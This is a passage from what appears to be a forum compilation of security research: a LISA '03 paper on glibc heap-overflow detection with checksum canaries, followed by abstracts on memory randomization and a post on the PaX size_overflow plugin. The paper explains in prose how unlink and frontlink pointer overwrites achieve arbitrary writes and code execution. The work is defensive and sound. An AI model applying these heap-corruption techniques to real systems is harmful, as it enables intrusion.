dynamic allocation, is not supported by C variables but is available via glibc functions. Dynamic memory allocation is a technique in which programs determine during run-time where information should be stored. It is needed when the amount of required memory or when the lifecycle of memory usage depends on factors that are not known a-priori. The two basic functions provided are one to dynamically allocate a block of memory (malloc), and one to return a previously allocated block to the system (free). Other routines (such as calloc, realloc) are then implemented on top of these two procedures. GNU Lib C uses Doug Lea's memory allocator dlmalloc [27] to implement the dynamic memory allocation functions. dlmalloc utilizes two core features, boundary tags and binning, to manage memory requests and releases on behalf of user programs. Memory management is based on `chunks,' memory blocks that consist of application usable regions and additional in-band management information. The in-band information, also called boundary tag, is stored at the beginning of each chunk and holds the sizes of the current and the previous chunk. This allows for coalescing two bordering unused chunks into one larger chunk, minimizing the number of unusable small chunks as a result of fragmentation. Also, all chunks can be traversed starting from any known chunk in either a forward or backward direction. Chunks that are currently not in use by the application (i.e., free chunks) are maintained in bins, grouped by size. Bins for sizes less than 512 bytes each hold chunks of only exactly one size; for sizes equal to or greater than 512 bytes, the size ranges are approximately logarithmically increasing. Searches for available chunks are processed in smallest-first, best-fit order, starting at the appropriate bin depending on the memory size requested. For unallocated chunks, the management information (boundary tag) includes two pointers for storing the chunk in a double linked list (called free list) associated with each bin. These list pointers are called forward (fd) and back (bk). On 32-bit architectures, the management information always contains two 4-byte size-information fields (the chunk size and the previous chunk size). When the chunk is unallocated, it also contains two 4-byte pointers that are utilized to manipulate the double linked list of free chunks for the binning. This basic algorithm is known to be very efficient. Although it is based upon a search mechanism to find best fits, the use of indexing techniques (i.e., binning) and the exploitation of special cases lead to average cases requiring only a few dozen instructions, depending on the machine and the allocation pattern. A number of heuristic improvements have also been incorporated into the memory management algorithm in addition to the main techniques. These include locality preservation, wilderness preservation, memory mapping, and caching [28]. Anatomy of a Heap Overflow Exploit The use of in-band forward and back pointers to link available chunks in bins exposes glibc's memory management routines to a security vulnerability. If a malicious user is able to overflow a dynamically allocated block of memory, that user could overwrite the next contiguous chunk header in memory. When the overflown chunk is unallocated, and thus in a bin's double linked list, the attacker can control the values of that chunk's forward and back pointers. Given this information, consider the unlink macro used by glibc shown below: #define unlink(P, BK, FD) { \ [1] FD = P->fd; \ [2] BK = P->bk; \ [3] FD->bk = BK; \ [4] BK->fd = FD; \ } Intended to remove a chunk from a bin's free list, the unlink routine can be subverted by a malicious user to write an arbitrary value to any address in memory. In the unlink macro shown above, the first parameter P points to the chunk that is about to be removed from the double linked list. The attacker has to store the address of a pointer (minus 12 bytes, as explained below) in are read and stored in the temporary variables FD and BK, respectively. At line [3], FD gets dereferenced and the address located at FD plus 12 bytes (the offset of the bk field within a boundary tag) is overwritten with the value stored in BK. This technique can be utilized, for example, to change an entry in the program's GOT (Global Offset Table) and redirect a function pointer to code of the attacker's choice. A similar situation occurs with the frontlink macro (shown in Figure 1). The task of this macro is to store the chunk of size S, pointed to by P, at the appropriate position in the double linked list of the bin with index IDX. FD is initialized with a pointer to the start of the list of the appropriate bin at line [1]. The loop at line [2] searches the double linked list to find the first chunk that is larger than P or the end of the list by following consecutive forward pointers (at line [3]). Note that every list stores chunks ordered by increasing sizes to facilitate a fast smallest-first search in case of memory allocations. When an attacker manages to overwrite the forward pointer of one of the traversed chunks with the address of a carefully crafted fake chunk, he could trick frontlink into leaving the loop (at line [2]) with FD pointing to this fake chunk. Next, the back pointer BK of that fake chunk would be read at line [4] and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P at line [5]. The attacker could store the address of a function pointer (minus 8 bytes) in the bk field of the fake chunk, and therefore trick frontlink into overwriting #define frontlink(A, P, S, IDX, BK, FD) { \ ... [1] FD = start_of_bin(IDX); [2] while ( FD != BK && S < chunksize(FD) ) { \ [3] FD = FD->fd; \ } \ [4] BK = FD->bk; \ ... [5] FD->bk = BK->fd = P; \ Figure 1: frontlink Macro. this function pointer with the address of the chunk P at line [5]. Although this macro does not allow arbitrary values to be written, the attacker may be able to store valid machine code at the address of P. This code would then be executed the next time the function pointed to by the overwritten integer is called. Figure 2: Original memory chunk structure and memory layout. A variation on the heap overflow exploit described above is also possible, involving the manipulation of a chunk's size field instead of its list pointers. An attacker can supply arbitrary values to an adjacent chunk's size field, similar to the manipulation the list pointers. When the size field is accessed, for example during the coalescing of two unused chunks, the heap management routines can be tricked into considering an arbitrary location in memory, possibly under the attacker's control, as the next chunk. An attacker can set up a fake chunk header at this location in order to perform an attack as discussed above. If an attacker is, for some reason, unable to write to the list pointers of an adjacent chunk header but is able to reach the adjacent chunk's size field, this attack represents a viable alternative. Heap Integrity Detection In order to protect the heap, our system makes several modifications to glibc's heap manager, both in the structure of individual chunks as well as the management routines themselves. Figure 3: Modified memory chunk structure and memory layout. Figure 2 depicts the original structure of a memory chunk in glibc. The first element in protecting each chunk's management information is to prepend a canary to the chunk structure, as shown in Figure 3. An additional padding field, __pad0, is also added (dlmalloc requires the size of a header of a used chunk to be a power of two). The canary contains a checksum of the chunk header seeded with a random value, described below. The second necessary element of our heap protection system is to introduce a global checksum seed value, which is held in a static variable (called __heap_magic). This variable is initialized during process startup with a random value, which is then protected against further writes by a call to mprotect. This is in contrast to stack protection schemes [29] that rely on repetitive calls to mprotect; since we only require a single invocation during process startup, we do not suffer from any related run-time performance loss associated with other schemes. The final element of the heap protection system is to augment the heap management routines with code to manage and check each chunk's canary. Newly allocated chunks to be returned from malloc have their canary initialized to a checksum covering their memory location and size fields, seeded with the global value of __heap_magic. Note that the checksum function does not cover the list pointer fields for allocated chunks, since these fields are part of the chunk's user data section. The new chunk is then released to the application. When a chunk is returned to the heap management through a call to free, the chunk's canary is checked against the checksum calculation performed when the chunk was released to the application. If the stored value does not match the current calculation, a corruption of the management information is assumed. At this point, an alert is raised, and the process is aborted. Otherwise, normal processing continues; the chunk is inserted into a bin and coalesced with bordering free chunks as necessary. Any free list manipulations which take place during this process are prefaced with a check of the involved chunks' canary values. After the deallocated chunk has been inserted into the free list, its canary is updated with a checksum covering its memory location, size fields, and list pointers, again seeded with the value of __heap_magic. The elements described above effectively prevent writes to arbitrary locations in memory by modifying a chunk's header fields without being detected, whether through an overflow into or through direct manipulation of the chunk header fields. Each allocated chunk is protected by a randomly- seeded checksum over its memory location and size fields, and each free chunk is protected by a randomly-seeded checksum over its memory location, size fields, and list pointers. Each access of a list pointer is protected by a check to insure that the integrity of the pointers has not been violated. Also, each use of the size field is protected. Furthermore, the checksum seed has been protected against malicious writes to guarantee that it cannot be overwritten with a value chosen by the attacker. As a beneficial side-effect, common programming errors such as unintended heap overflows or double invocations of free are detected by this system as well. A double call to free refers to the situation where a programmer mistakenly attempts to deallocate the same chunk twice. This error is detected due to a checksum mismatch. When the chunk is deallocated for the first time, its canary is updated to a new value reflecting its position on the free list. When the second call to free is executed, the checksum is checked again, with the assumption that it is an allocated chunk. However, since the canary has been updated and the check fails, an alarm is raised. A limitation of our approach is the fact that we do not address general pointer corruption attacks, such as subversion of an application's function pointers. The system does not guarantee the integrity of user data contained within chunks in the heap; rather, the system guarantees only that the chunk headers themselves are valid. It is also worth noting that the heap implementation included with glibc already contains functionality that attempts to ensure the integrity of the heap management information for debugging purposes. However, use of the debugging routines incurs significant cost in a production environment. The routines perform a full scan of the heap's free lists and global state during each execution of a heap management function, and include checks unrelated to heap pointer exploitation. Furthermore, there is no guarantee that all attacks are detected. Not all list manipulations are checked, and malicious values could pass integrity checks which are not specifically intended to protect against malicious overflows. Thus, we conclude that the included debugging functionality is not suitable for protecting against the vulnerabilities that we address. The system described above has been implemented for glibc 2.3 and glibc 2.2.9x, pre-release versions of glibc 2.3 utilized by RedHat 8.0. However, the techniques developed for glibc are easily adaptable to other heap designs, including those shipped with the various BSD derivatives or commercial Unix implementations. Thus, further work is planned to apply this technique to other popular open systems besides glibc. Evaluation The purpose of this section is to experimentally verify the effectiveness of our heap protection technique. We also discuss the performance impact of our proposed extension and its stability. To assess the ability of our protection scheme, we obtained several real- world exploits that perform heap overflow attacks against vulnerable programs. These were WU-Ftpd File Globbing Heap Corruption Vulnerability [30] against wuftpd 2.6.0, Sudo Password Prompt Heap Overflow Vulnerability [31] against sudo 1.6.3, and CVS Directory Request Double Free Heap Corruption Vulnerability [32] against cvs 1.11.4. In addition, we used two proof-of-concept programs presented in [8] that demonstrate examples of the exploit techniques using the unlink and the frontlink macro, respectively. We also developed a variant of the unlink exploit to demonstrate that dlmalloc's debugging routines can be easily evaded and do not provide protection comparable to our technique. All vulnerable programs were run under RedHat Linux 8.0. The exploits have been executed three times, once with the default C library (i.e., glibc 2.2.93), once with the patched library including our heap integrity code, and once with the default C library and enabled debugging. The third run was performed to determine the effectiveness of the built-in debugging mechanisms in detecting heap-based overflows. Table 1 shows the results of our experiments. A column entry of `shell' indicates that an exploit was successful and provided an interactive shell with the credentials of the vulnerable process. A `segfault' entry indicates that the exploit successfully corrupted the heap, but failed to run arbitrary code (note that it might still be possible to change the exploit to gain elevated privileges). `aborted' means that the memory corruption has been successfully detected and the process has been terminated. The results show that our technique was successful in detecting all corruptions of in-bound management information, and safely terminated the processes. Note that the built-in debugging support is also relatively effective in detecting inconsistencies, however, it does not offer complete protection and imposes a significantly higher performance penalty than our patch. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [/TR] [TR] [TD]WU-Ftpd[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]Sudo[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]CVS[/TD] [TD]segfault[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]unlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]frontlink[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]aborted[/TD] [/TR] [TR] [TD]debug evade[/TD] [TD]shell[/TD] [TD]aborted[/TD] [TD]shell[/TD] [/TR] [/TABLE] Table 1: Detection effectiveness. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [TD]glibc + debugging[/TD] [/TR] [TR] [/TR] [TR] [TD]Loop[/TD] [TD]1,587[/TD] [TD]2,033 (+ 28%)[/TD] [TD]2,621 (+ 65%)[/TD] [/TR] [TR] [TD]AIM 9[/TD] [TD]5,094[/TD] [TD]5,338 (+ 5%)[/TD] [TD]7,603 (+ 49%)[/TD] [/TR] [/TABLE] Table 2: Micro-Benchmarks. The performance impact of our scheme has been measured using several micro- and macro-benchmarks. We are aware of the fact that the memory management routines are an important part of almost all applications, and therefore, it is necessary to implement them efficiently. It is obvious that our protection approach inflicts a certain amount of overhead, but we also claim that this overhead is tolerable for most real-world applications and is easily compensated for by the increase in security. To get a baseline for the worst slowdown that can be expected, we wrote a simple micro-benchmark that allocates and frees around four million (to be more precise, 222) objects of random sizes between 0 and 1024 bytes in a tight loop. The maximum size of 1024 was chosen to obtain a balanced distribution of objects in dedicated bins (for chunks with sizes less than 512 bytes) and objects in bins that cover a range of different sizes (for chunks with sizes greater than or equal to 512 bytes). We also utilized the dynamic memory benchmark present in the AIM 9 test suite [33]. Table 2 shows the average run- time in milliseconds over 100 iterations for the two micro-benchmarks. We provide results for a system with the default glibc, the glibc with heap protection and the glibc with debugging. For more realistic measurements that reflect the impact on real-world applications, we utilized Mindcraft's WebStone [34] and OSDB [35]. WebStone is a client-server benchmark for HTTP servers that issues a number of HTTP GET requests for specific pages on a Web server and measures the throughput and response latency of each HTTP transfer. OSDB (open source database benchmark) is a benchmark that evaluates the I/O throughput and general processing power of GNU Linux systems. It is a test suite built on AS3AP, the ANSI SQL Scalable and Portable Benchmark, for evaluating the performance of database systems. Figure 4 and Figure 5 show the throughput and the response latency measurements for an increasing number of HTTP clients in the WebStone benchmark, for both the default glibc and the patched version. We used an Intel Pentium 4 with 1.8 GHz, 1 GB RAM, Linux RedHat 8.0, and a 3COM 905C-TX NIC for the experiments, running Apache 2.0.40. It can be seen that even for hundred simultaneous clients, virtually no performance impact was recorded. Similar results have been obtained for OSDB 0.15.1. The following Table 3 shows the measurements for 10 parallel clients that used our test machine (the same as above) to full capacity, running a PostgreSQL 7.2.3 database. The results show the total run-time in seconds for the single-user and multi-user tests. We also attempted to assess the stability of the patched library over an extended period in time. For this purpose, the patch was installed on the Lab's web server (running Apache 2.0.40) and CVS server (running cvs 1.11.60). A patched library was also used on two desktop machines, running RedHat 8.0 and Gentoo 1.4, respectively. Although the web server only receives a small number of requests, the CVS server is regularly used for our software development and the desktop machines are the workstations of two of the authors. All machines were stable and have been running without any problems for a period of several weeks. Figure 4: HTTP client response time. Figure 5: HTTP client throughput. [TABLE][TR] [TD]Package[/TD] [TD]glibc[/TD] [TD]glibc + heap prot.[/TD] [/TR] [TR] [/TR] [TR] [TD]OSDB[/TD] [TD]6,015[/TD] [TD]6,070 (+ 0.91%)[/TD] [/TR] [/TABLE] Table 3: OSDB benchmark. Installation Several methods of deploying our heap protection system have been developed, in order to accommodate various system environments and levels of desired protection. Many important security mechanisms are not applied because of the complexity and the required effort during setup. We provide different avenues that range from the installation of a pre-compiled package (with minimal effort) to a complete source rebuild of glibc. One method is to download and install our library modifications as a source patch against glibc. Administrators can select the version appropriate to their system and apply it against a pristine glibc source tree before proceeding with the usual glibc source installation procedure. Source-based distributions, such as Gentoo Linux, can also easily incorporate these patches into their packaging system. A second method of deploying is to create packages for various distributions of Linux that replace the system glibc image with a version containing our modifications (such as RedHat RPMs). The advantage of this approach is that virtually all applications on the target machine will be automatically protected against heap overflow exploitation, with the exception of those applications which are statically linked against glibc or perform their own memory management. A possible disadvantage is that these applications will also experience some level of performance degradation, which could be prohibitive in some high-performance environments. A third method of deploying our heap protection system uses packages that install a protected glibc image alongside the existing image, instead of replacing the system's glibc image altogether. A script is provided that utilizes the system loader's LD_ PRELOAD functionality to substitute the protected glibc image for the system image for an individual application. This allows an administrator to selectively enable protection only for certain applications (e.g., an administrator may not feel it necessary to protect applications which cannot be executed remotely, and therefore may wish to only protect those applications which are network-accessible). This is also a suitable path for admins that are afraid of potentially destabilizing their entire system by performing a system-wide deployment of a heap modification which has not undergone the extensive real-world testing that standalone dlmalloc has. All of the described installation methods are documented in detail on our website, located at http://www.cs.ucsb.edu/~rsg/heap/. Packages for various popular distributions and source patches can be downloaded as well. Conclusions This paper presents a technique for detecting heap-based overflows that tamper with in-band memory management data structures. We discuss different ways to mount such attacks and show our mechanism to detect and prevent them. We implemented a patch for glibc 2.3 that extends the utilized data structures with a canary that stores a checksum over the sensitive data. This checksum calculation involves a secret seed that makes it infeasible for an intruder to guess or fake the canary in an attack. Experience shows that system administrators are often reluctant to adopt security measures in the systems they administer. Installing new tools may require significant effort to understand how to best apply the technology in the administrator's network, as well as investment in training end users. Additionally, applying a new tool may interfere with existing critical systems or impose unacceptable run-time overhead. This paper introduces a heap protection mechanism that increases application security in a way that is nearly transparent to the functioning of applications and is invisible to users. Applying the system to existing installations has few drawbacks. Recompilation of applications is rarely required, and the system imposes minimal overhead on application performance. Acknowledgments This research was supported by the Army Research Office, under agreement DAAD19-01-1- 0484. The U.S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright annotation thereon. The views and conclusions contained herein are those of the author and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of the Army Research Office, or the U.S. Government. Author Information Christopher Kruegel is working as a research postgraduate in the Reliable Software Group at the University of California, Santa Barbara. Previously, he was an assistant professor at the Distributed Systems Group at the Technical University Vienna. Kruegel holds the M.S. and Ph.D. degrees in computer science from the Technical University Vienna. His research focus is on network security, with an emphasis on intrusion detection. You can contact him at chris@cs.ucsb.edu. Darren Mutz is a doctoral student in the Computer Science department at the University of California, Santa Barbara. His research interests are in network security and intrusion detection. From 1997 to 2001 he was employed as a member of technical staff in the Planning and Scheduling Group at the Jet Propulsion Laboratory where he engaged in research efforts focused on applying AI, machine learning, and optimization methodologies to problems in space exploration. He holds a B.S. degree in Computer Science from UCSB and can be contacted at dhm@cs.ucsb.edu. William Robertson is a first-year PhD student in the Computer Science department at the University of California, Santa Barbara. His research interests include intrusion detection, hardening of computer systems, and routing security. He received his B.S. degree in Computer Science from UC Santa Barbara, and can be reached electronically at wkr@cs.ucsb.edu. Fredrik Valeur is currently a Ph.D. student at UC Santa Barbara. He holds a Sivilingenioer degree in Computer Science from the Norwegian University of Science and Technology. His research interests include intrusion detection, network security and network scanning techniques. He can be contacted at fredrik@cs.ucsb.edu. References [1] Spafford, E., "The Internet Work Program," Analysis Computer Communication Review, 1998. [2] AlephOne, Smashing the Stack for Fun and Profit, http://www.phrack.org/phrack/49/P49-14. [3] Wilander, J. and M. Kamkar, "Comparison of Publicly Available Tools for Dynamic Buffer Overflow Prevention," 10th Network and Distributed System Security Symposium, 2003. [4] CERT Advisory CA-2002-11, "Heap Overflow in Cachefs Daemon (cachefsd)," CERT Advisory CA-2002-11 Heap Overflow in Cachefs Daemon (cachefsd). [5] CERT Advisory CA-2002-33, "Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)," CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC). [6] Conover, M., w00w00 on Heap Overflows, http://www.w00w00.org/files/articles/heaptut.txt. [7] anonymous, Once upon a free(), http://www.phrack.org/phrack/57/p57-0x09. [8] Kaempf, M., Vudo malloc tricks, http://www.phrack.org/phrack/57/p57-0x08. [9] Designer, Solar, JPEG COM Marker Processing Vulnerability in Netscape Browsers, JPEG COM Marker Processing Vulnerability in Netscape Browsers and Microsoft Products, and a generic heap-based buffer overflow exploitation technique. [10] The GNU C Library, The GNU C Library. [11] Cowan, C., et al., "StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks," 7th USENIX Security Conference, 1998. [12] Vendicator, Stack Shield Technical Info, Stack Shield. [13] Baratloo, A., N. Singh and T. Tsai, Libsafe: Protecting critical elements of stacks, Avaya Business Communications Research & Development - Avaya Labs. [14] Baratloo, A., N. Singh and T. Tsai, "Transparent Run-time Defense Against Stack Smashing Attacks," USENIX Annual Technical Conference, 2000. [15] Designer, Solar, Non-executable stack patch, Openwall - bringing security into open computing environments. [16] RSX: Run-time addressSpace eXtender, http://www.starzetz.com/software/rsx/index.html. [17] PAX: Non-executable heap-segments, http://pageexec.virtualave.net/index.html. [18] Valgrind, an open-source memory debugger for x86-GNU/Linux, http://developer.kde.org/~sewardj/index.html. [19] Electric Fence - Memory Debugger, http://www.gnu.org/directory/devel/debug/ElectricFence.html. [20] Huang, Y., Protection Against Exploitation of Stack and Heap Overflows, http://members.rogers.com/exurity/pdf/AntiOverflows.pdf. [21] Necula, George C., Scott McPeak, and Westley Weimer, "CCured: Type- safe retrotting of legacy code," 29th ACM Symposium on Principles of Programming Languages, 2002. [22] Dean, D., E. Felten and D. Wallach, "Java Security: From HotJava to Netscape and Beyond," IEEE Symposium on Security and Privacy, 1996. [23] The Last Stage of Delirium (LSD), Java and Java Virtual Machine Vulnerabilities and their Exploitation Techniques, http://www.lsd-pl.net/java_security.html. [24] ISO JTC 1/SC 22/WG 14 - C, http://std.dkuug.dk/JTC1/SC22/WG14/index.html. [25] ISO JTC 1/SC 22/WG 15 - POSIX, ISO/IEC JTC1/SC22/WG15 - POSIX. [26] The GNU C Library Manual, http://www.gnu.org/manual/glibc-2.2.5/libc.html. [27] Lea, D., A Memory Allocator, A Memory Allocator. [28] Wilson, P., M. Johnstone, M. Neely, and D. Boles, "Dynamic Storage Allocation: A Survey and Critical Review," International Workshop on Memory Management, 1995. [29] Chiueh, T., and F. Hsu, "RAD: A Compile-time Solution to Buffer Overflow Attacks," 21st Conference on Distributed Computing Systems, 2001. [30] WU-Ftpd File Globbing Heap Corruption Vulnerability, Wu-Ftpd File Globbing Heap Corruption Vulnerability. [31] Sudo Password Prompt Heap Overflow Vulnerability, Sudo Password Prompt Heap Overflow Vulnerability. [32] CVS Directory Request Double Free Heap Corruption Vulnerability, CVS Directory Request Double Free Heap Corruption Vulnerability. [33] AIM IX Benchmarks, http://www.caldera.com/developers/community/contrib/aim.html. [34] Mindcraft WebStone - The Benchmark for Web Servers, Mindcraft - WebStone Benchmark Information. [35] OSDB - The Open Source Database Benchmark, The Open Source Database Benchmark. Sursa: LISA '03
  15. Data Randomization Cristian Cadar Microsoft Research Cambridge, UK cristic@stanford.edu Periklis Akritidis Microsoft Research Cambridge, UK pa280@cl.cam.ac.uk Manuel Costa Microsoft Research Cambridge, UK manuelc@microsoft.com Jean-Phillipe Martin Microsoft Research Cambridge, UK jpmartin@microsoft.com Miguel Castro Microsoft Research Cambridge, UK mcastro@microsoft.com Abstract Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. Then it assigns a random mask to each class and it generates code instrumented to xor data read from or written to memory with the mask of the memory operand’s class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can preventmany attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11%(0%to 27%) and an average space overhead below 1%. Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
  16. Thwarting Code Injection Attacks with System Service Interface Randomization Xuxian Jiangy, Helen J. Wangz, Dongyan Xu, Yi-Min Wangz y George Mason University z Microsoft Research Purdue University xjiang@ise.gmu.edu fhelenw, ymwangg@microsoft.com dxu@cs.purdue.edu Abstract Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operation systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. Two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, trivial combination of both schemes is not sufcient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR along with a number of new enhancements to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead. Keywords: Internet Security, Code Injection Attack, System Randomization Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
  17. Linux Security in 10 years Brad Spengler / grsecurity Download: grsecurity.net/spender_summit.pdf
  18. The Guaranteed End of Arbitrary Code Execution Online: http://grsecurity.net/PaX-presentation_files/frame.htm
  19. Inside the Size Overflow Plugin by ephox » Tue Aug 28, 2012 5:30 pm Hello everyone, my name is Emese (ephox). You may already know me for my previous project, the constify gcc plugin that pipacs took over and put into PaX. http://www.grsecurity.net/~ephox/const_plugin/ This time I would like to introduce to you a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin called size_overflow whose purpose is to detect a subset of the integer overflow security bugs at runtime. https://grsecurity.net/~ephox/overflow_plugin/ On integer overflows briefly In the C language integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one) then the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of memory allocator function becomes smaller due to the overflow. There is a very good description on integer overflow in Phrack: http://www.phrack.org/issues.html?issue ... 10#article The history of the plugin The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example: #define kmalloc(size,flags) \ ({ \ void *buffer = NULL; \ intoverflow_t overflow_size = (intoverflow_t)size; \ \ if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \ buffer = kmalloc((size_t)overflow_size, (flags)); \ buffer; \ }) This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions. The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore if there was an integer overflow during the evaluation of the other expressions then the remaining computation would use the overflowed value that the intoverflow_t cast cannot detect. Second, only a few basic allocator functions had wrapper macros because wrapping every function with a size argument would have been a big job and resulted in an unmaintainable patch. In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression. Internals of the size_overflow plugin The compilation process is divided into passes in between or in place of which a plugin can insert its own. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin. Before I describe the plugin in more detail, let's look at some gcc terms The gimple structure in gcc represents the statements (stmt) of the high level language. For example this is what a function call (gimple_code: GIMPLE_CALL) looks like: gimple_call <malloc, D.4425_2, D.4421_15> or a subtract (gimple_code: GIMPLE_ASSIGN) stmt: gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5> This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones. Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15) which is also the lhs of the assignment, so we use-def relation between the two stmts, that is the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt. Further reading on SSA and GIMPLE: SSA - GNU Compiler Collection (GCC) Internals GIMPLE - GNU Compiler Collection (GCC) Internals The plugin gets called for each function and goes through their stmts looking for calls to marked functions. In the kernel, functions can be marked two ways: with a function attribute for fuctions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread) listed in a hash table (for functions calling the above basic functions) In userland there is only a hash table (e.g., openssl). The present description covers the kernel. The attribute Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like: __attribute__((size_overflow(1))) where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute similarly to other attributes: __size_overflow(...). For example: unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2); static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags) { ... } Further documentation about attributes: Attributes - GNU Compiler Collection (GCC) Internals The hash table Originally we only had the attribute similarly to the constify plugin but in order to reduce the kernel patch size (e.g., in 3.5.1 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h. A hash table entry is described by the size_overflow_hash structure whose fields are the following: next: the hash chain pointer to the next entry name: name of the function param: an integer with bits set corresponding to the size parameters For example this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like: struct size_overflow_hash _000008_hash = { .next = NULL, .name = "kmalloc", .param = PARAM1, }; The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()). Example: struct size_overflow_hash *size_overflow_hash[65536] = { [11268] = &_000008_hash, }; The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html Enabling the size_overflow plugin in the kernel in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters .config (under PaX): CONFIG_PAX_SIZE_OVERFLOW .config (without PaX): CONFIG_SIZE_OVERFLOW stmt duplication with double wide integer types When the plugin finds a marked function then it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy. In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type: function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo inline asm (GIMPLE_ASM): it may have side effects too. taking the address of an object (ADDR_EXPR): todo pointers (MEM_REF, etc.): todo division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types global variables: todo If the marked function's parameter can be traced back to a parameter of the caller then the plugin checks if the caller is already in the hash table (or it is marked with the attribute). If it isn't then the plugin prints the following message: Function %s is missing from the size_overflow hash table +%s+%d+%u+" (caller's name, parameter's number, hash) If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it. Inserting the overflow checks The plugin inserts overflow checks in the following cases: marked function parameters just before the function call stmt with a constant operand, see gcc intentional overflow negations (BIT_NOT_EXPR) type cast stmts between these types: --------------------------------- | from | to | lhs | rhs | --------------------------------- | u32 | u32 | - | ! | | u32 | s32 | TODO | *! | | s32 | u32 | TODO | *! | | s32 | s32 | - | ! | | u32 | u64 | ! | ! | | u32 | s64 | TODO | ! | | s32 | u64 | TODO | ! | | s32 | s64 | ! | ! | | u64 | u32 | ! | ! | | u64 | s32 | TODO | ! | | s64 | u32 | TODO | ! | | s64 | s32 | ! | ! | | u64 | u64 | - | ! | | u64 | s64 | TODO | *! | | s64 | u64 | TODO | *! | | s64 | s64 | - | ! | --------------------------------- Legend: from: source type to: destination type lhs: is the lhs checked? rhs: is the rhs checked? !: the plugin inserts an overflow check TODO: would be nice to insert an overflow check, see todo *!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction) -: no overflow check is needed When the plugin finds one of the above cases then it will insert a range check against the double wide variable value (TYPE_MIN, TYPE_MAX of the original variable type). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check 